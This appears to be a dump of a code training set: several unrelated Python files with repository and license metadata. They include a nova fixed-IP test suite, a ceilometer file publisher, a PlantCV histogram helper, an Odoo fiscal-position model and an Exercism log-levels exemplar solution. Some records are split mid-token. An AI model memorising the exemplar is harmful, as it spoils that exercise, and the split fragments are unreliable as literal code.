((-3, 0), TTLocalizer.RaceGameBackThreeSpaces, 0),
((0, 3), TTLocalizer.RaceGameOthersForwardThree, 0),
((0, 3), TTLocalizer.RaceGameOthersForwardThree, 0),
((0, 0), TTLocalizer.RaceGameJellybeans2, 2),
((0, 0), TTLocalizer.RaceGameJellybeans2, 2),
((0, 0), TTLocalizer.RaceGameJellybeans2, 2),
((0, 0), TTLocalizer.RaceGameJellybeans2, 2),
((0, 0), TTLocalizer.RaceGameJellybeans4, 4),
((0, 0), TTLocalizer.RaceGameJel
|
lybeans4, 4),
((0, 0), TTLocalizer.RaceGameJellybeans4, 4),
((0, 0), TTLocalizer.RaceGameJellybeans4, 4),
((0, 0), TTLocalizer.RaceGameJellybeans10, 10),
((0, 0), -1, 0),
((N
|
umberToWin, 0), TTLocalizer.RaceGameInstantWinner, 0))
|
Diti24/python-ivi
|
ivi/tektronix/tektronixMDO3012.py
|
Python
|
mit
| 1,724
| 0.00116
|
"""
Python Interchangeable Virtual Instrument Library
Copyright (c) 2016 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from .tektronixMDO3000 import *
class tektronixMDO3012(tektronixMDO3000):
    "Tektronix MDO3012 IVI oscilloscope driver"
    def __init__(self, *args, **kwargs):
        # Only set the default id if a subclass has not already provided one.
        self.__dict__.setdefault('_instrument_id', 'MDO3012')
        super(tektronixMDO3012, self).__init__(*args, **kwargs)
        # MDO3012 hardware: 2 analog + 16 digital channels, 100 MHz bandwidth.
        self._analog_channel_count = 2
        self._digital_channel_count = 16
        self._channel_count = self._analog_channel_count + self._digital_channel_count
        self._bandwidth = 100e6
        # AFG option
        self._output_count = 1
        self._init_channels()
        self._init_outputs()
|
fcurella/django-settings_inspector
|
settings_inspector/gui/windows/variables.py
|
Python
|
mit
| 1,500
| 0.000667
|
from .base import ScrollWindow
from settings_inspector.gui import keys
class VariablesWindow(ScrollWindow):
    """Scrollable window listing every registered settings variable."""
    def __init__(self, settings, *args, **kwargs):
        super(VariablesWindow, self).__init__(*args, **kwargs)
        self.root_settings = settings
        self.reset()
        self.render()
        # Bug fix: the original ended with "return self"; returning a
        # non-None value from __init__ raises TypeError at instantiation.
    def reset(self):
        """Clear window state and repopulate it from the variable registry."""
        self.settings = {}
        self.current_line = 0
        self.current_column = 0
        self.add_variables()
        self.refresh()
    def add_variables(self):
        """Write one "name = value" line per registered variable."""
        for name, variable in self.root_settings.variable_registry.variables.items():
            self.write(u"%s = %s" % (variable.name, variable.value))
            self.next_line()
    def on_ch(self, cmd):
        """Handle a keypress: 's' switches to the settings view."""
        if cmd == keys.LOWERCASE_S:
            self.parent_ui.show_settings()
        else:
            super(VariablesWindow, self).on_ch(cmd)
class VariableHistoryWindow(ScrollWindow):
    """Scrollable window showing the assignment history of one variable."""
    def __init__(self, settings, variable, *args, **kwargs):
        super(VariableHistoryWindow, self).__init__(*args, **kwargs)
        self.root_settings = settings
        self.variable = variable
        self.reset()
        self.render()
        # Bug fix: the original ended with "return self"; returning a
        # non-None value from __init__ raises TypeError at instantiation.
    def reset(self):
        """Clear window state and repopulate it from the variable's history."""
        self.settings = {}
        self.current_line = 0
        self.current_column = 0
        self.add_variable()
        self.refresh()
    def add_variable(self):
        """Write one line per recorded assignment of the variable."""
        # NOTE(review): the attribute is "assignment" (singular) but holds an
        # iterable of assignments -- confirm against the Variable model.
        for assignment in self.variable.assignment:
            self.write(u"%s" % (assignment))
            self.next_line()
|
jmluy/xpython
|
exercises/concept/log-levels/.meta/exemplar.py
|
Python
|
mit
| 1,610
| 0.001242
|
from enum import Enum
class LogLevel(Enum):
    """Represent different log levels by their three-letter verbose codes."""
    TRACE = 'TRC'
    DEBUG = 'DBG'
    INFO = 'INF'
    WARNING = 'WRN'
    # Shares WARNING's value, so WARN is an alias: LogLevel.WARN is LogLevel.WARNING.
    WARN = 'WRN'
    ERROR = 'ERR'
    FATAL = 'FTL'
    UNKNOWN = 'UKN'
class LogLevelInt(Enum):
    """Represent different log levels by their short (numeric) codes."""
    TRACE = 0
    DEBUG = 1
    INFO = 4
    WARNING = 5
    # Shares WARNING's value, so WARN is an alias of LogLevelInt.WARNING.
    WARN = 5
    ERROR = 6
    FATAL = 7
    UNKNOWN = 42
def parse_log_level(message):
    """Return the LogLevel enum member for a log message.

    :param message: log message (string), e.g. "[ERR]: disk full"
    :return: enum - 'LogLevel.<level>'; 'LogLevel.UNKNOWN' for an
             unrecognised severity code.
    """
    prefix, _, _ = message.partition(':')
    # Strip the surrounding brackets from e.g. "[ERR]".
    code = prefix[1:-1]
    try:
        return LogLevel(code)
    except ValueError:
        return LogLevel.UNKNOWN
def convert_to_short_log(log_level, message):
|
"""Convert a log message to its shorter format.
:param log_level: enum - 'LogLevel.<level>' e.g. 'LogLevel.Error'
:param message: str - log message
:return: enum - 'LogLevelInt.<value>` e.g. 'LogLevelInt.5'
"""
return f'{LogLevelInt[log_level.name].value}:{message}'
def get_warn_alias():
    """Return the canonical enum member for the 'WRN' code.

    :return: LogLevel.WARNING (which LogLevel.WARN aliases)
    """
    return LogLevel.WARNING
def get_members():
    """Return all members of the enum.

    :return: list of tuples - [(name1, value1), (name2, value2)]
    """
    # Canonical members only; aliases such as WARN are skipped by iteration.
    return [(member.name, member.value) for member in LogLevel]
|
eharney/nova
|
nova/tests/api/openstack/compute/plugins/v3/test_multinic.py
|
Python
|
apache-2.0
| 5,154
| 0
|
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import webob
from nova import compute
from nova.openstack.common import jsonutils
from nova import test
from nova.tests.api.openstack import fakes
# Fixed instance UUID used by every request in this test module.
UUID = '70f6db34-de8d-4fbd-aafb-4065bdfa6114'

# Capture slots: the stub compute-API functions below record the arguments
# of their most recent call here so tests can assert on them.
last_add_fixed_ip = (None, None)
last_remove_fixed_ip = (None, None)
def compute_api_add_fixed_ip(self, context, instance, network_id):
    """Stub for compute.api.API.add_fixed_ip; records (uuid, network_id)."""
    global last_add_fixed_ip
    last_add_fixed_ip = (instance['uuid'], network_id)
def compute_api_remove_fixed_ip(self, context, instance, address):
    """Stub for compute.api.API.remove_fixed_ip; records (uuid, address)."""
    global last_remove_fixed_ip
    last_remove_fixed_ip = (instance['uuid'], address)
def compute_api_get(self, context, instance_id, expected_attrs=None,
                    want_objects=False):
    """Stub for compute.api.API.get returning a minimal fake instance."""
    fake_instance = {'id': 1, 'uuid': instance_id}
    return fake_instance
class FixedIpTest(test.NoDBTestCase):
    """Tests for the os-multinic add/remove fixed IP server actions.

    (Repaired: one test method's ``def`` line was split by corruption in
    the source; the repeated request-building boilerplate is factored into
    the private ``_post_action`` helper.)
    """

    def setUp(self):
        super(FixedIpTest, self).setUp()
        fakes.stub_out_networking(self.stubs)
        fakes.stub_out_rate_limiting(self.stubs)
        # Replace the compute API with the recording stubs defined above.
        self.stubs.Set(compute.api.API, "add_fixed_ip",
                       compute_api_add_fixed_ip)
        self.stubs.Set(compute.api.API, "remove_fixed_ip",
                       compute_api_remove_fixed_ip)
        self.stubs.Set(compute.api.API, 'get', compute_api_get)
        self.app = fakes.wsgi_app_v3(init_only=('servers', 'os-multinic'))

    def _post_action(self, body):
        """POST *body* as JSON to the server-action URL; return the response."""
        req = webob.Request.blank('/v3/servers/%s/action' % UUID)
        req.method = 'POST'
        req.body = jsonutils.dumps(body)
        req.headers['content-type'] = 'application/json'
        return req.get_response(self.app)

    def test_add_fixed_ip(self):
        global last_add_fixed_ip
        last_add_fixed_ip = (None, None)
        resp = self._post_action(dict(add_fixed_ip=dict(network_id='test_net')))
        self.assertEqual(resp.status_int, 202)
        self.assertEqual(last_add_fixed_ip, (UUID, 'test_net'))

    def test_add_fixed_ip_empty_network_id(self):
        resp = self._post_action({'add_fixed_ip': {'network_id': ''}})
        self.assertEqual(400, resp.status_int)

    def test_add_fixed_ip_network_id_bigger_than_36(self):
        resp = self._post_action({'add_fixed_ip': {'network_id': 'a' * 37}})
        self.assertEqual(400, resp.status_int)

    def test_add_fixed_ip_no_network(self):
        global last_add_fixed_ip
        last_add_fixed_ip = (None, None)
        resp = self._post_action(dict(add_fixed_ip=dict()))
        self.assertEqual(resp.status_int, 400)
        # The stub must not have been reached for a malformed request.
        self.assertEqual(last_add_fixed_ip, (None, None))

    def test_remove_fixed_ip(self):
        global last_remove_fixed_ip
        last_remove_fixed_ip = (None, None)
        resp = self._post_action(dict(remove_fixed_ip=dict(address='10.10.10.1')))
        self.assertEqual(resp.status_int, 202)
        self.assertEqual(last_remove_fixed_ip, (UUID, '10.10.10.1'))

    def test_remove_fixed_ip_invalid_address(self):
        resp = self._post_action({'remove_fixed_ip': {'address': ''}})
        self.assertEqual(400, resp.status_int)

    def test_remove_fixed_ip_no_address(self):
        global last_remove_fixed_ip
        last_remove_fixed_ip = (None, None)
        resp = self._post_action(dict(remove_fixed_ip=dict()))
        self.assertEqual(resp.status_int, 400)
        # The stub must not have been reached for a malformed request.
        self.assertEqual(last_remove_fixed_ip, (None, None))
|
rickerc/ceilometer_audit
|
ceilometer/publisher/file.py
|
Python
|
apache-2.0
| 3,579
| 0
|
# -*- encoding: utf-8 -*-
#
# Copyright 2013 IBM Corp
#
# Author: Tong Li <litong01@us.ibm.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import logging.handlers
import urlparse
from ceilometer import publisher
from ceilometer.openstack.common import log
LOG = log.getLogger(__name__)
class FilePublisher(publisher.PublisherBase):
    """Publisher metering data to file.

    The publisher which records metering data into a file. The file name and
    location should be configured in ceilometer pipeline configuration file.
    If a file name and location is not specified, this File Publisher will not
    log any meters other than log a warning in Ceilometer log file.

    To enable this publisher, add the following section to file
    /etc/ceilometer/publisher.yaml or simply add it to an existing pipeline.

        -
            name: meter_file
            interval: 600
            counters:
                - "*"
            transformers:
            publishers:
                - file:///var/test?max_bytes=10000000&backup_count=5

    File path is required for this publisher to work properly. If max_bytes
    or backup_count is missing, FileHandler will be used to save the metering
    data. If max_bytes and backup_count are present, RotatingFileHandler will
    be used to save the metering data.
    """

    def __init__(self, parsed_url):
        super(FilePublisher, self).__init__(parsed_url)

        self.publisher_logger = None
        path = parsed_url.path
        if not path or path.lower() == 'file':
            # (Repaired: this message was split by corruption in the source.)
            LOG.error('The path for the file publisher is required')
            return

        rfh = None
        max_bytes = 0
        backup_count = 0
        # Handling other configuration options in the query string
        if parsed_url.query:
            params = urlparse.parse_qs(parsed_url.query)
            if params.get('max_bytes') and params.get('backup_count'):
                try:
                    max_bytes = int(params.get('max_bytes')[0])
                    backup_count = int(params.get('backup_count')[0])
                except ValueError:
                    LOG.error('max_bytes and backup_count should be '
                              'numbers.')
                    return
        # create rotating file handler; maxBytes=0 (the default above)
        # disables rollover, so a URL without rotation params behaves like
        # a plain FileHandler.
        rfh = logging.handlers.RotatingFileHandler(
            path, encoding='utf8', maxBytes=max_bytes,
            backupCount=backup_count)
        self.publisher_logger = logging.Logger('publisher.file')
        # Keep metering records out of the application's root logger output.
        self.publisher_logger.propagate = False
        self.publisher_logger.setLevel(logging.INFO)
        rfh.setLevel(logging.INFO)
        self.publisher_logger.addHandler(rfh)

    def publish_samples(self, context, samples):
        """Send a metering message for publishing

        :param context: Execution context from the service or RPC call
        :param samples: Samples from pipeline after transformation
        """
        # publisher_logger stays None when __init__ bailed out on a bad URL;
        # in that case samples are silently dropped (by design, see class doc).
        if self.publisher_logger:
            for sample in samples:
                self.publisher_logger.info(sample.as_dict())
|
stiphyMT/plantcv
|
plantcv/plantcv/visualize/histogram.py
|
Python
|
mit
| 6,304
| 0.002855
|
# Plot histogram
import os
import numpy as np
from plantcv.plantcv.threshold import binary as binary_threshold
from plantcv.plantcv import params
from plantcv.plantcv import fatal_error
from plantcv.plantcv._debug import _debug
import pandas as pd
from plotnine import ggplot, aes, geom_line, labels, scale_color_manual
def _hist_gray(gray_img, bins, lower_bound, upper_bound, mask=None):
    """ Prepare the ready to plot histogram data

    Inputs:
    gray_img       = grayscale image to analyze
    bins           = divide the data into n evenly spaced bins
    lower_bound    = the lower bound of the bins (x-axis min value)
    upper_bound    = the upper bound of the bins (x-axis max value)
    mask           = binary mask, calculate histogram from masked area only (default=None)

    Returns:
    bin_labels     = an array of histogram bin labels
    hist_percent   = an array of histogram represented by percent values
    hist_gray_data = an array of histogram (original values)

    :param gray_img: numpy.ndarray
    :param bins: int
    :param lower_bound: int
    :param upper_bound: int
    :param mask: numpy.ndarray
    :return bin_labels: numpy.ndarray
    :return hist_percent: numpy.ndarray
    :return hist_gray_data: numpy.ndarray
    """
    params.device += 1
    debug = params.debug

    # Apply mask if one is supplied
    # (Repaired: two comments here were split by corruption in the source;
    # trailing commented-out dead code was removed.)
    if mask is not None:
        min_val = np.min(gray_img)
        pixels = len(np.where(mask > 0)[0])

        # apply plant shaped mask to image; suppress debug output while the
        # helper threshold runs
        params.debug = None
        mask1 = binary_threshold(mask, 0, 255, 'light')
        mask1 = (mask1 / 255)
        # push masked-out pixels far below the lower bound so they never
        # land inside any histogram bin
        masked = np.where(mask1 != 0, gray_img, min_val - 5000)
    else:
        pixels = gray_img.shape[0] * gray_img.shape[1]
        masked = gray_img
    params.debug = debug

    # Store histogram data
    hist_gray_data, hist_bins = np.histogram(masked, bins, (lower_bound, upper_bound))

    # make hist percentage for plotting
    hist_percent = (hist_gray_data / float(pixels)) * 100

    # use middle value of every bin as bin label
    bin_labels = np.array([np.average([hist_bins[i], hist_bins[i + 1]]) for i in range(0, len(hist_bins) - 1)])

    return bin_labels, hist_percent, hist_gray_data
def histogram(img, mask=None, bins=100, lower_bound=None, upper_bound=None, title=None, hist_data=False):
    """Plot histograms of each input image channel

    Inputs:
    img            = an RGB or grayscale image to analyze
    mask           = binary mask, calculate histogram from masked area only (default=None)
    bins           = divide the data into n evenly spaced bins (default=100)
    lower_bound    = the lower bound of the bins (x-axis min value) (default=None)
    upper_bound    = the upper bound of the bins (x-axis max value) (default=None)
    title          = a custom title for the plot (default=None)
    hist_data      = return the frequency distribution data if True (default=False)

    Returns:
    fig_hist       = histogram figure
    hist_df        = dataframe with histogram data, with columns "pixel intensity" and "proportion of pixels (%)"

    :param img: numpy.ndarray
    :param mask: numpy.ndarray
    :param bins: int
    :param lower_bound: int
    :param upper_bound: int
    :param title: str
    :param hist_data: bool
    :return fig_hist: plotnine.ggplot.ggplot
    :return hist_df: pandas.core.frame.DataFrame
    """
    if not isinstance(img, np.ndarray):
        fatal_error("Only image of type numpy.ndarray is supported input!")
    if len(img.shape) < 2:
        fatal_error("Input image should be at least a 2d array!")

    # Determine the observed intensity range (from the masked area only,
    # when a mask is given).
    if mask is not None:
        masked = img[np.where(mask > 0)]
        img_min, img_max = np.nanmin(masked), np.nanmax(masked)
    else:
        img_min, img_max = np.nanmin(img), np.nanmax(img)

    # for lower / upper bound, if given, use the given value, otherwise, use the min / max of the image
    lower_bound = lower_bound if lower_bound is not None else img_min
    upper_bound = upper_bound if upper_bound is not None else img_max

    # Channel labels: BGR names for 3-channel images, numeric strings otherwise.
    if len(img.shape) > 2:
        if img.shape[2] == 3:
            b_names = ['blue', 'green', 'red']
        else:
            b_names = [str(i) for i in range(img.shape[2])]

    if len(img.shape) == 2:
        # Grayscale: a single histogram labelled as channel '0'.
        bin_labels, hist_percent, hist_ = _hist_gray(img, bins=bins, lower_bound=lower_bound, upper_bound=upper_bound,
                                                     mask=mask)
        hist_df = pd.DataFrame(
            {'pixel intensity': bin_labels, 'proportion of pixels (%)': hist_percent, 'hist_count': hist_,
             'color channel': ['0' for _ in range(len(hist_percent))]})
    else:
        # Assumption: RGB image
        # Initialize dataframe column arrays
        px_int = np.array([])
        prop = np.array([])
        hist_count = np.array([])
        channel = []
        for (b, b_name) in enumerate(b_names):
            bin_labels, hist_percent, hist_ = _hist_gray(img[:, :, b], bins=bins, lower_bound=lower_bound,
                                                         upper_bound=upper_bound, mask=mask)
            # Append histogram data for each channel
            px_int = np.append(px_int, bin_labels)
            prop = np.append(prop, hist_percent)
            hist_count = np.append(hist_count, hist_)
            channel = channel + [b_name for _ in range(len(hist_percent))]
        # Create dataframe
        hist_df = pd.DataFrame(
            {'pixel intensity': px_int, 'proportion of pixels (%)': prop, 'hist_count': hist_count,
             'color channel': channel})

    # One line per channel, colored by the 'color channel' column.
    fig_hist = (ggplot(data=hist_df,
                       mapping=aes(x='pixel intensity', y='proportion of pixels (%)', color='color channel'))
                + geom_line())

    if title is not None:
        fig_hist = fig_hist + labels.ggtitle(title)
    if len(img.shape) > 2 and img.shape[2] == 3:
        # Force line colors to match the BGR channel names.
        fig_hist = fig_hist + scale_color_manual(['blue', 'green', 'red'])

    # Plot or print the histogram
    _debug(visual=fig_hist, filename=os.path.join(params.debug_outdir, str(params.device) + '_hist.png'))

    if hist_data is True:
        return fig_hist, hist_df
    return fig_hist
|
orchidinfosys/odoo
|
addons/account/models/partner.py
|
Python
|
gpl-3.0
| 22,069
| 0.006434
|
# -*- coding: utf-8 -*-
from operator import itemgetter
import time
from openerp import api, fields, models, _
from openerp.tools import DEFAULT_SERVER_DATETIME_FORMAT
from openerp.exceptions import ValidationError
class AccountFiscalPosition(models.Model):
    """Fiscal position: maps taxes and accounts depending on the partner's
    region/VAT status, with automatic detection rules.

    (Repaired: one ``search`` statement in ``_get_fpos_by_region`` was split
    by corruption in the source.)
    """
    _name = 'account.fiscal.position'
    _description = 'Fiscal Position'
    _order = 'sequence'

    sequence = fields.Integer()
    name = fields.Char(string='Fiscal Position', required=True)
    active = fields.Boolean(default=True,
        help="By unchecking the active field, you may hide a fiscal position without deleting it.")
    company_id = fields.Many2one('res.company', string='Company')
    account_ids = fields.One2many('account.fiscal.position.account', 'position_id', string='Account Mapping', copy=True)
    tax_ids = fields.One2many('account.fiscal.position.tax', 'position_id', string='Tax Mapping', copy=True)
    note = fields.Text('Notes')
    auto_apply = fields.Boolean(string='Detect Automatically', help="Apply automatically this fiscal position.")
    vat_required = fields.Boolean(string='VAT required', help="Apply only if partner has a VAT number.")
    country_id = fields.Many2one('res.country', string='Country',
        help="Apply only if delivery or invoicing country match.")
    country_group_id = fields.Many2one('res.country.group', string='Country Group',
        help="Apply only if delivery or invocing country match the group.")
    state_ids = fields.Many2many('res.country.state', string='Federal States')
    zip_from = fields.Integer(string='Zip Range From', default=0)
    zip_to = fields.Integer(string='Zip Range To', default=0)
    # To be used in hiding the 'Federal States' field('attrs' in view side) when selected 'Country' has 0 states.
    states_count = fields.Integer(compute='_compute_states_count')

    @api.one
    def _compute_states_count(self):
        self.states_count = len(self.country_id.state_ids)

    @api.one
    @api.constrains('zip_from', 'zip_to')
    def _check_zip(self):
        # An empty range (0, 0) is valid; only reject inverted ranges.
        if self.zip_from > self.zip_to:
            raise ValidationError(_('Invalid "Zip Range", please configure it properly.'))
        return True

    @api.v7
    def map_tax(self, cr, uid, fposition_id, taxes, context=None):
        """Old-API variant: map tax ids through the fiscal position."""
        if not taxes:
            return []
        if not fposition_id:
            return map(lambda x: x.id, taxes)
        result = set()
        for t in taxes:
            ok = False
            for tax in fposition_id.tax_ids:
                if tax.tax_src_id.id == t.id:
                    if tax.tax_dest_id:
                        result.add(tax.tax_dest_id.id)
                    ok = True
            if not ok:
                result.add(t.id)
        return list(result)

    @api.v8    # noqa
    def map_tax(self, taxes):
        """New-API variant: map a tax recordset through the fiscal position."""
        result = self.env['account.tax'].browse()
        for tax in taxes:
            tax_count = 0
            for t in self.tax_ids:
                if t.tax_src_id == tax:
                    tax_count += 1
                    if t.tax_dest_id:
                        result |= t.tax_dest_id
            # Taxes with no mapping line pass through unchanged.
            if not tax_count:
                result |= tax
        return result

    @api.v7
    def map_account(self, cr, uid, fposition_id, account_id, context=None):
        """Old-API variant: map a single account id through the position."""
        if not fposition_id:
            return account_id
        for pos in fposition_id.account_ids:
            if pos.account_src_id.id == account_id:
                account_id = pos.account_dest_id.id
                break
        return account_id

    @api.v8
    def map_account(self, account):
        """New-API variant: map a single account record through the position."""
        for pos in self.account_ids:
            if pos.account_src_id == account:
                return pos.account_dest_id
        return account

    @api.v8
    def map_accounts(self, accounts):
        """ Receive a dictionary having accounts in values and try to replace those accounts accordingly to the fiscal position.
        """
        ref_dict = {}
        for line in self.account_ids:
            ref_dict[line.account_src_id] = line.account_dest_id
        for key, acc in accounts.items():
            if acc in ref_dict:
                accounts[key] = ref_dict[acc]
        return accounts

    @api.onchange('country_id')
    def _onchange_country_id(self):
        # Selecting a single country resets the group/zip criteria.
        if self.country_id:
            self.zip_from = self.zip_to = self.country_group_id = False
            self.state_ids = [(5,)]
            self.states_count = len(self.country_id.state_ids)

    @api.onchange('country_group_id')
    def _onchange_country_group_id(self):
        # Selecting a country group resets the single-country/zip criteria.
        if self.country_group_id:
            self.zip_from = self.zip_to = self.country_id = False
            self.state_ids = [(5,)]

    @api.model
    def _get_fpos_by_region(self, country_id=False, state_id=False, zipcode=False, vat_required=False):
        """Find the best auto-apply fiscal position for a region, from most
        to least specific criteria (country+state+zip down to catchall)."""
        if not country_id:
            return False
        base_domain = [('auto_apply', '=', True), ('vat_required', '=', vat_required)]
        null_state_dom = state_domain = [('state_ids', '=', False)]
        null_zip_dom = zip_domain = [('zip_from', '=', 0), ('zip_to', '=', 0)]
        null_country_dom = [('country_id', '=', False), ('country_group_id', '=', False)]

        if zipcode and zipcode.isdigit():
            zipcode = int(zipcode)
            zip_domain = [('zip_from', '<=', zipcode), ('zip_to', '>=', zipcode)]
        else:
            zipcode = 0

        if state_id:
            state_domain = [('state_ids', '=', state_id)]

        domain_country = base_domain + [('country_id', '=', country_id)]
        domain_group = base_domain + [('country_group_id.country_ids', '=', country_id)]

        # Build domain to search records with exact matching criteria
        fpos = self.search(domain_country + state_domain + zip_domain, limit=1)
        # return records that fit the most the criteria, and fallback on less specific fiscal positions if any can be found
        if not fpos and state_id:
            fpos = self.search(domain_country + null_state_dom + zip_domain, limit=1)
        if not fpos and zipcode:
            fpos = self.search(domain_country + state_domain + null_zip_dom, limit=1)
        if not fpos and state_id and zipcode:
            fpos = self.search(domain_country + null_state_dom + null_zip_dom, limit=1)

        # fallback: country group with no state/zip range
        if not fpos:
            fpos = self.search(domain_group + null_state_dom + null_zip_dom, limit=1)

        if not fpos:
            # Fallback on catchall (no country, no group)
            fpos = self.search(base_domain + null_country_dom, limit=1)
        return fpos or False

    @api.model
    def get_fiscal_position(self, partner_id, delivery_id=None):
        if not partner_id:
            return False
        # This can be easily overriden to apply more complex fiscal rules
        PartnerObj = self.env['res.partner']
        partner = PartnerObj.browse(partner_id)

        # if no delivery use invoicing
        if delivery_id:
            delivery = PartnerObj.browse(delivery_id)
        else:
            delivery = partner

        # partner manually set fiscal position always win
        if delivery.property_account_position_id or partner.property_account_position_id:
            return delivery.property_account_position_id.id or partner.property_account_position_id.id

        # First search only matching VAT positions
        vat_required = bool(partner.vat)
        fp = self._get_fpos_by_region(delivery.country_id.id, delivery.state_id.id, delivery.zip, vat_required)

        # Then if VAT required found no match, try positions that do not require it
        if not fp and vat_required:
            fp = self._get_fpos_by_region(delivery.country_id.id, delivery.state_id.id, delivery.zip, False)

        return fp.id if fp else False
class AccountFiscalPositionTax(models.Model):
_name = 'account.fiscal.position.tax'
_description = 'Taxes Fiscal Position'
_rec_name = 'position_id'
position_id = fields.Many2one('account.fiscal.position', string='Fiscal Position',
required=True, ondelete='cascade')
tax_src_id = fields.Many2one('account.tax', string='Tax on Product', required=True)
tax_dest_id
|
fajoy/nova
|
nova/cells/manager.py
|
Python
|
apache-2.0
| 9,098
| 0.000879
|
# Copyright (c) 2012 Rackspace Hosting
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Cells Service Manager
"""
import datetime
import time
from nova.cells import messaging
from nova.cells import state as cells_state
from nova.cells import utils as cells_utils
from nova import context
from nova import exception
from nova import manager
from nova.openstack.common import cfg
from nova.openstack.common import importutils
from nova.openstack.common import log as logging
from nova.openstack.common import timeutils
# Configuration options for the nova-cells manager; registered below under
# the [cells] option group.
cell_manager_opts = [
    cfg.StrOpt('driver',
               default='nova.cells.rpc_driver.CellsRPCDriver',
               help='Cells communication driver to use'),
    cfg.IntOpt("instance_updated_at_threshold",
               default=3600,
               help="Number of seconds after an instance was updated "
                    "or deleted to continue to update cells"),
    cfg.IntOpt("instance_update_num_instances",
               default=1,
               help="Number of instances to update per periodic task run")
]

# Module-level logger for this service.
LOG = logging.getLogger(__name__)

CONF = cfg.CONF
CONF.register_opts(cell_manager_opts, group='cells')
class CellsManager(manager.Manager):
"""The nova-cells manager class. This class defines RPC
methods that the local cell may call. This class is NOT used for
messages coming from other cells. That communication is
driver-specific.
Communication to other cells happens via the messaging module. The
MessageRunner from that module will handle routing the message to
the correct cell via the communications driver. Most methods below
create 'targeted' (where we want to route a message to a specific cell)
or 'broadcast' (where we want a message to go to multiple cells)
messages.
Scheduling requests get passed to the scheduler class.
"""
RPC_API_VERSION = '1.0'
def __init__(self, *args, **kwargs):
# Mostly for tests.
cell_state_manager = kwargs.pop('cell_state_manager', None)
super(CellsManager, self).__init__(*args, **kwargs)
if cell_state_manager is None:
cell_state_manager = cells_state.CellStateManager
self.state_manager = cell_state_manager()
self.msg_runner = messaging.MessageRunner(self.state_manager)
cells_driver_cls = importutils.import_class(
CONF.cells.driver)
self.driver = cells_driver_cls()
self.instances_to_heal = iter([])
def
|
post_start_hook(self):
"""Have the driver start its consumers for inter-cell communication.
Also ask our child cells for their capacities and capabilit
|
ies so
we get them more quickly than just waiting for the next periodic
update. Receiving the updates from the children will cause us to
update our parents. If we don't have any children, just update
our parents immediately.
"""
# FIXME(comstud): There's currently no hooks when services are
# stopping, so we have no way to stop consumers cleanly.
self.driver.start_consumers(self.msg_runner)
ctxt = context.get_admin_context()
if self.state_manager.get_child_cells():
self.msg_runner.ask_children_for_capabilities(ctxt)
self.msg_runner.ask_children_for_capacities(ctxt)
else:
self._update_our_parents(ctxt)
@manager.periodic_task
def _update_our_parents(self, ctxt):
"""Update our parent cells with our capabilities and capacity
if we're at the bottom of the tree.
"""
self.msg_runner.tell_parents_our_capabilities(ctxt)
self.msg_runner.tell_parents_our_capacities(ctxt)
@manager.periodic_task
def _heal_instances(self, ctxt):
"""Periodic task to send updates for a number of instances to
parent cells.
On every run of the periodic task, we will attempt to sync
'CONF.cells.instance_update_num_instances' number of instances.
When we get the list of instances, we shuffle them so that multiple
nova-cells services aren't attempting to sync the same instances
in lockstep.
If CONF.cells.instance_update_at_threshold is set, only attempt
to sync instances that have been updated recently. The CONF
setting defines the maximum number of seconds old the updated_at
can be. Ie, a threshold of 3600 means to only update instances
that have modified in the last hour.
"""
if not self.state_manager.get_parent_cells():
# No need to sync up if we have no parents.
return
info = {'updated_list': False}
def _next_instance():
try:
instance = self.instances_to_heal.next()
except StopIteration:
if info['updated_list']:
return
threshold = CONF.cells.instance_updated_at_threshold
updated_since = None
if threshold > 0:
updated_since = timeutils.utcnow() - datetime.timedelta(
seconds=threshold)
self.instances_to_heal = cells_utils.get_instances_to_sync(
ctxt, updated_since=updated_since, shuffle=True,
uuids_only=True)
info['updated_list'] = True
try:
instance = self.instances_to_heal.next()
except StopIteration:
return
return instance
rd_context = ctxt.elevated(read_deleted='yes')
for i in xrange(CONF.cells.instance_update_num_instances):
while True:
# Yield to other greenthreads
time.sleep(0)
instance_uuid = _next_instance()
if not instance_uuid:
return
try:
instance = self.db.instance_get_by_uuid(rd_context,
instance_uuid)
except exception.InstanceNotFound:
continue
self._sync_instance(ctxt, instance)
break
def _sync_instance(self, ctxt, instance):
"""Broadcast an instance_update or instance_destroy message up to
parent cells.
"""
if instance['deleted']:
self.instance_destroy_at_top(ctxt, instance)
else:
self.instance_update_at_top(ctxt, instance)
def schedule_run_instance(self, ctxt, host_sched_kwargs):
